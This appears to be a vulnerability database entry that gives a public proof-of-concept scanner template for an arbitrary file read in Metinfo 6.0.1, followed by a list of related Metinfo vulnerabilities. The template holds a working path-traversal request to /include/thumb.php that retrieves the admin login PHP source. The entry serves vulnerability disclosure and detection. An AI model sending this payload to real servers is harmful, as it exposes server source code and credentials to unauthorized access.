CNVD-2018-13393: Metinfo file read

漏洞描述

PoC代码[已公开]

id: CNVD-2018-13393

info:
  name: Metinfo file read
  author: JingLing
  severity: high
  verified: false
  description: |
    介绍: Metinfo 6.0.1 存在任意文件读取漏洞，攻击者可通过构造恶意请求获取服务器上的任意文件。
  tags: cnvd,cnvd2018,fileread,metinfo
  created: 2020/09/11

rules:
  r0:
    request:
      method: GET
      path: /include/thumb.php?dir=http\..\admin\login\login_check.php
      follow_redirects: true
    expression: response.body.bcontains(b"<?php") && response.body.bcontains(b"login_met_cookie($metinfo_admin_name);")
expression: r0()

相关漏洞推荐

• POCCVE-2019-16996: Metinfo 7.0.0 beta - SQL Injection
• POCCVE-2019-16997: Metinfo 7.0.0 beta - SQL Injection
• POCCVE-2019-17418: MetInfo 7.0.0 beta - SQL Injection
• POCCNVD-2018-13393: Metinfo - Local File Inclusion
• POCCVE-2019-16996: Metinfo 7.0.0 beta - SQL Injection
• POCCVE-2019-16997: Metinfo 7.0.0 beta - SQL Injection
• POCCVE-2019-17418: MetInfo 7.0.0 beta - SQL Injection
• POCCNVD-2018-13393: Metinfo - Local File Inclusion
• 无POCMetInfo /app/system/entrance.php 任意文件上传漏洞
• 无POCMetinfo /admin/index.php 任意文件上传漏洞
• 无POCMetInfo V5.3.1_news.php sql注入
• 无POCmetinfo5.2版本search/search.php注入漏洞
• 无POCmetinfo SQL延时注入漏洞F